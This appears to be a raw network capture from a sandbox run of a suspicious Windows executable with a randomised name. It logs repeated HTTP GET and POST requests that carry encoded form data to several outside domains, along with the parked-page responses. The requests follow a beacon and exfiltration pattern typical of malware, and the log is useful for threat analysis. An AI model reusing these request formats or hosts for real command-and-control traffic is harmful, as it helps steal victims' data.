Nov 12, 2024 15:32:44.689294100 CET	5341	OUT	Data Raw: 75 6f 79 62 4c 4e 31 44 66 39 77 6f 51 4e 61 54 6f 55 67 45 35 49 4f 50 59 46 39 44 73 61 68 55 74 55 33 66 61 58 69 76 62 36 35 34 76 42 58 31 4c 63 4e 4f 77 79 48 51 74 4d 4f 49 39 58 73 4f 45 33 77 47 43 42 6a 78 51 4e 65 63 39 66 70 33 72 48 Data Ascii: uoybLN1Df9woQNaToUgE5IOPYF9DsahUtU3faXivb654vBX1LcNOwyHQtMOI9XsOE3wGCBjxQNec9fp3rHOGP6qy5qXM1qEos2XQsQYj/kLz3wZICbPPfyq3bnsq2A3pRJztlWeVTim3KD0lQpctmpjUGPeQl01Cm61TMJcbIlC8OPqfTPYUh9G83Uj604QQtTcEYQKjynzrwEkOtqino2Iw1jp6+FsF5Y9d4x/v8B5pB0rEOOK
Nov 12, 2024 15:32:44.824861050 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:32:44 GMT content-type: text/html; charset=utf-8 content-length: 1122 x-request-id: aaa8ded0-ace0-4b38-af31-f720829616ab cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw== set-cookie: parking_session=aaa8ded0-ace0-4b38-af31-f720829616ab; expires=Tue, 12 Nov 2024 14:47:44 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:32:44.824929953 CET	522	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWFhOGRlZDAtYWNlMC00YjM4LWFmMzEtZjcyMDgyOTYxNmFiIiwicGFnZV90aW1lIjoxNzMxNDIxOTY0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	49767	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:47.355833054 CET	476	OUT	GET /yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM HTTP/1.1 Host: www.jiujiuxi.love Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:32:47.490995884 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:32:47 GMT content-type: text/html; charset=utf-8 content-length: 1446 x-request-id: 0f9306c1-258e-4093-9abf-15cd0cb267c1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vSCaT957zDST2rkX2szfn4/xrNC8UWuqWKFGoZTCuOliJfJ67MU/vmGvtiR/R7lflHdAl0SAznOJzOHDMCoeLg== set-cookie: parking_session=0f9306c1-258e-4093-9abf-15cd0cb267c1; expires=Tue, 12 Nov 2024 14:47:47 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 53 43 61 54 39 35 37 7a 44 53 54 32 72 6b 58 32 73 7a 66 6e 34 2f 78 72 4e 43 38 55 57 75 71 57 4b 46 47 6f 5a 54 43 75 4f 6c 69 4a 66 4a 36 37 4d 55 2f 76 6d 47 76 74 69 52 2f 52 37 6c 66 6c 48 64 41 6c 30 53 41 7a 6e 4f 4a 7a 4f 48 44 4d 43 6f 65 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vSCaT957zDST2rkX2szfn4/xrNC8UWuqWKFGoZTCuOliJfJ67MU/vmGvtiR/R7lflHdAl0SAznOJzOHDMCoeLg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:32:47.491017103 CET	846	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY5MzA2YzEtMjU4ZS00MDkzLTlhYmYtMTVjZDBjYjI2N2MxIiwicGFnZV90aW1lIjoxNzMxNDIxOTY3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	49768	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:52.842777014 CET	741	OUT	POST /z4qw/ HTTP/1.1 Host: www.moneys.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.moneys.fit Referer: http://www.moneys.fit/z4qw/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 72 45 30 32 37 65 7a 6b 64 6c 52 66 45 53 32 61 75 31 42 6f 61 73 45 6b 52 34 79 55 37 77 6c 64 4e 37 4b 30 58 38 70 6d 70 63 35 42 55 72 6a 55 31 75 5a 33 5a 77 70 72 35 75 54 6f 77 31 34 59 79 52 43 45 75 79 59 77 55 6c 45 45 71 54 56 4f 71 4f 69 61 69 61 4a 69 62 77 4d 66 4e 74 79 52 61 76 61 5a 6a 6a 44 6b 6a 34 39 70 41 61 4f 4d 54 79 6b 2f 30 37 63 64 30 55 5a 78 49 68 56 48 4e 2b 33 4b 45 6c 79 55 2b 6b 33 61 65 37 54 42 34 67 2b 6c 41 63 31 6c 6a 77 46 45 55 56 36 36 35 74 4f 51 35 5a 4e 7a 42 45 30 2f 73 69 48 71 52 4c 43 44 46 41 3d 3d Data Ascii: mRu=oyc5+wz09Z7xrE027ezkdlRfES2au1BoasEkR4yU7wldN7K0X8pmpc5BUrjU1uZ3Zwpr5uTow14YyRCEuyYwUlEEqTVOqOiaiaJibwMfNtyRavaZjjDkj49pAaOMTyk/07cd0UZxIhVHN+3KElyU+k3ae7TB4g+lAc1ljwFEUV665tOQ5ZNzBE0/siHqRLCDFA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	49769	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:55.513207912 CET	761	OUT	POST /z4qw/ HTTP/1.1 Host: www.moneys.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.moneys.fit Referer: http://www.moneys.fit/z4qw/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 71 6e 73 32 6f 70 76 6b 4b 56 52 59 61 69 32 61 67 56 42 73 61 73 49 6b 52 36 66 4a 37 47 4e 64 4f 65 32 30 55 34 39 6d 73 63 35 42 41 37 69 2f 6f 65 5a 38 5a 77 6c 38 35 73 48 6f 77 30 63 59 79 54 61 45 75 46 73 78 56 31 45 47 68 7a 56 41 6b 75 69 61 69 61 4a 69 62 30 63 31 4e 74 71 52 62 63 43 5a 69 47 2f 6c 67 34 39 6f 55 4b 4f 4d 58 79 6c 58 30 37 63 6a 30 52 77 35 49 6e 5a 48 4e 2f 48 4b 45 78 6d 56 78 6b 33 6d 51 62 53 4d 34 43 72 76 59 39 5a 51 6d 68 56 68 58 45 75 2f 78 62 44 4b 6b 72 35 58 43 58 6f 4e 6f 53 2b 43 54 4a 44 59 59 43 67 55 6e 50 58 57 75 43 6f 6a 4f 4b 75 6d 43 6b 54 33 53 75 34 3d Data Ascii: mRu=oyc5+wz09Z7xqns2opvkKVRYai2agVBsasIkR6fJ7GNdOe20U49msc5BA7i/oeZ8Zwl85sHow0cYyTaEuFsxV1EGhzVAkuiaiaJib0c1NtqRbcCZiG/lg49oUKOMXylX07cj0Rw5InZHN/HKExmVxk3mQbSM4CrvY9ZQmhVhXEu/xbDKkr5XCXoNoS+CTJDYYCgUnPXWuCojOKumCkT3Su4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	49770	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:58.185039997 CET	2578	OUT	POST /z4qw/ HTTP/1.1 Host: www.moneys.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.moneys.fit Referer: http://www.moneys.fit/z4qw/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 79 63 35 2b 77 7a 30 39 5a 37 78 71 6e 73 32 6f 70 76 6b 4b 56 52 59 61 69 32 61 67 56 42 73 61 73 49 6b 52 36 66 4a 37 47 46 64 4e 72 36 30 55 66 42 6d 76 63 35 42 44 37 6a 59 6f 65 5a 74 5a 77 39 77 35 73 62 34 77 32 55 59 79 32 4f 45 6d 51 41 78 63 31 45 47 75 54 56 4e 71 4f 69 50 69 61 59 70 62 77 34 31 4e 74 71 52 62 62 36 5a 79 6a 44 6c 74 59 39 70 41 61 4f 51 54 79 6c 73 30 34 73 56 30 52 38 70 49 33 35 48 4f 66 58 4b 47 43 4f 56 38 6b 33 6b 64 37 54 66 34 43 33 73 59 39 46 32 6d 68 68 62 58 46 32 2f 79 61 71 74 32 72 39 2f 41 31 67 6c 30 54 75 48 58 35 4f 49 65 43 55 38 72 63 62 4a 6e 33 77 72 47 72 4b 65 5a 52 37 64 49 4c 76 30 58 6a 69 61 47 4a 6d 38 4b 69 46 51 49 65 73 39 55 54 44 48 2f 57 78 70 47 62 59 4b 4b 4f 66 48 4d 6d 75 4a 31 5a 54 56 2f 2f 48 68 45 69 61 4c 33 4e 58 48 37 33 78 38 6d 6f 61 37 6a 36 36 69 65 73 6e 50 45 4a 4c 41 6a 56 41 33 62 41 4e 72 67 73 63 44 7a 70 42 75 47 2f 78 4c 37 79 50 42 61 39 49 47 35 6f 2f 44 76 2b 64 55 70 48 74 64 69 69 61 44 77 41 [TRUNCATED] Data Ascii: mRu=oyc5+wz09Z7xqns2opvkKVRYai2agVBsasIkR6fJ7GFdNr60UfBmvc5BD7jYoeZtZw9w5sb4w2UYy2OEmQAxc1EGuTVNqOiPiaYpbw41NtqRbb6ZyjDltY9pAaOQTyls04sV0R8pI35HOfXKGCOV8k3kd7Tf4C3sY9F2mhhbXF2/yaqt2r9/A1gl0TuHX5OIeCU8rcbJn3wrGrKeZR7dILv0XjiaGJm8KiFQIes9UTDH/WxpGbYKKOfHMmuJ1ZTV//HhEiaL3NXH73x8moa7j66iesnPEJLAjVA3bANrgscDzpBuG/xL7yPBa9IG5o/Dv+dUpHtdiiaDwAt19JEHV7aObUDt6WD0gTA5fkVwEHQwH7SG5bstxrD4ArjkW1WQF1c5pumpqht8l4TLzuaXSeELiOORa8v3vPaeEupjKTDCwpU02j3d4XYWUIH762fkodxNEwE6ZtObzUwAHZstn3TWSyzlkbf4fbn0ULcXycy+tfK/jgZT7mxx/1TMPlNzOceg3Iak7TG2fZfnxFdThdmWAMcHk+HVO/1957mTB8iI6TdbUsri/vutfdD2VGEigOvVYESApc2M/TyWekM3XIRVNBJA6yszkjvEaOPHrZEKAkHq3Ikls6cUqgr5j+37j92u+B1Kd6poO4SCEc7mdEUM+ezOj/sC8L09PZp4a5IWwdX49PcXiupLfGMlntWKQk5i/6DgxJGuprCvAqd0XdD6uijKpAQMHVwtcqo5WXUnQRItOL7Fw9D0YqIHmFEP/RDIrglmfHKrjRptuNYunSPkw+z9lE/Q9Ru/0KNs0wlAzEWQMxfq7FYBMLFtSK7JS4+YfrBBp5259y13LHSU0lwSgyNTA+pWpas1qL+ISDoFgeqiAYKLtEzhFvSr4R5Hb1b9ishXfFCGsNM6mGKoL2KpCO8gXlkO7TNtadN+DLEiggC53qvDkyJx4rxQ7fJQxE8Ava7H8nv9ayrYPQQX2suicP6DA7g7IxmxOCVciNIfjJxU [TRUNCATED]
Nov 12, 2024 15:32:58.185067892 CET	5156	OUT	Data Raw: 77 68 75 63 36 30 70 6a 51 79 38 70 74 33 50 46 6e 57 56 66 71 74 75 34 65 32 36 4a 71 51 39 6c 47 61 71 75 49 4a 6a 76 50 69 65 6d 33 56 43 39 52 67 63 77 46 72 73 62 55 43 2b 57 54 62 78 48 69 4b 4b 2f 4e 5a 4b 30 55 35 4f 50 38 4b 77 2f 33 66 Data Ascii: whuc60pjQy8pt3PFnWVfqtu4e26JqQ9lGaquIJjvPiem3VC9RgcwFrsbUC+WTbxHiKK/NZK0U5OP8Kw/3fdduagt5fnxoPmJDvuacnUUvlE7IcBHyS7VFETc8ChkAXx2ziAY1WOuCuQynpJyZKtP6UPkQ3ZjQ47UBIceYjMcLzuOiS0ISCMkhqRM0Q/SvN2wQTu9Bbm40RBLYPKZaeBvtG7ELXew9INZc83fYTahI3tU7822Dmi
Nov 12, 2024 15:32:58.185115099 CET	176	OUT	Data Raw: 59 34 79 64 6a 79 39 67 55 73 4f 44 49 65 46 51 5a 64 71 2f 50 79 64 47 4a 72 70 2f 64 78 77 48 6f 78 53 6b 4a 39 6e 45 68 64 57 72 59 75 6c 7a 54 77 5a 48 34 72 65 66 33 79 33 53 6d 30 59 49 72 4f 56 58 5a 75 4d 74 76 31 54 35 64 43 55 56 61 36 Data Ascii: Y4ydjy9gUsODIeFQZdq/PydGJrp/dxwHoxSkJ9nEhdWrYulzTwZH4ref3y3Sm0YIrOVXZuMtv1T5dCUVa6NZQlRE26BzWYry5t3g8s/HCapnpcBMTsJSKrVhGOxmt2e/NMi1ZXyxV7ouYRW1s3rZ5A+fhSh8Hfr/NYJ5VN3Xobe6Ww==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	49771	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:00.852329016 CET	473	OUT	GET /z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM HTTP/1.1 Host: www.moneys.fit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:33:00.987587929 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:33:00 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 6c 77 30 5a 39 45 2f 4e 32 49 2f 64 70 57 6c 6b 38 70 54 4c 4a 48 52 43 5a 6b 75 59 33 6a 39 53 66 4b 63 68 44 35 61 6f 2b 67 4a 64 4d 62 57 77 66 6f 31 75 72 76 49 6e 50 65 72 52 32 65 63 61 53 46 35 34 78 64 75 74 2b 30 39 4f 6a 6a 66 54 6f 78 67 73 59 47 70 34 6a 55 4a 5a 6c 4d 75 73 74 62 38 33 50 68 73 39 4f 71 2f 54 65 73 58 4f 79 7a 53 75 6c 4b 63 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	49772	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:06.430661917 CET	747	OUT	POST /x1pj/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.vnxoso88.art Referer: http://www.vnxoso88.art/x1pj/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 5a 30 70 65 46 4b 4d 61 57 74 47 79 38 4d 69 4b 6e 34 38 37 4a 33 31 33 4f 6d 4d 52 39 75 36 38 57 67 72 61 30 54 61 75 78 55 47 59 78 79 42 51 4d 34 45 4a 67 63 7a 78 53 67 31 6a 30 43 44 77 58 64 33 79 7a 75 68 43 71 70 79 64 43 4b 6a 6a 36 4e 76 7a 48 2f 59 42 74 56 4d 6d 35 71 54 67 66 65 70 31 65 34 59 50 58 39 63 76 34 39 4b 58 4c 49 39 6b 56 4d 48 35 2b 59 6f 64 6e 58 77 45 37 6d 52 47 43 37 71 42 6d 78 49 65 47 6a 51 69 74 79 30 4d 6f 55 38 41 38 39 75 5a 6f 77 78 43 50 46 6c 46 34 36 61 63 61 56 47 34 6e 36 35 76 6a 62 75 32 45 41 3d 3d Data Ascii: mRu=mp81Gwhod4YCZ0peFKMaWtGy8MiKn487J313OmMR9u68Wgra0TauxUGYxyBQM4EJgczxSg1j0CDwXd3yzuhCqpydCKjj6NvzH/YBtVMm5qTgfep1e4YPX9cv49KXLI9kVMH5+YodnXwE7mRGC7qBmxIeGjQity0MoU8A89uZowxCPFlF46acaVG4n65vjbu2EA==
Nov 12, 2024 15:33:06.570781946 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:06 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 5ba46aa8-d800-460b-91ab-7004720afb1a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw== set-cookie: parking_session=5ba46aa8-d800-460b-91ab-7004720afb1a; expires=Tue, 12 Nov 2024 14:48:06 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
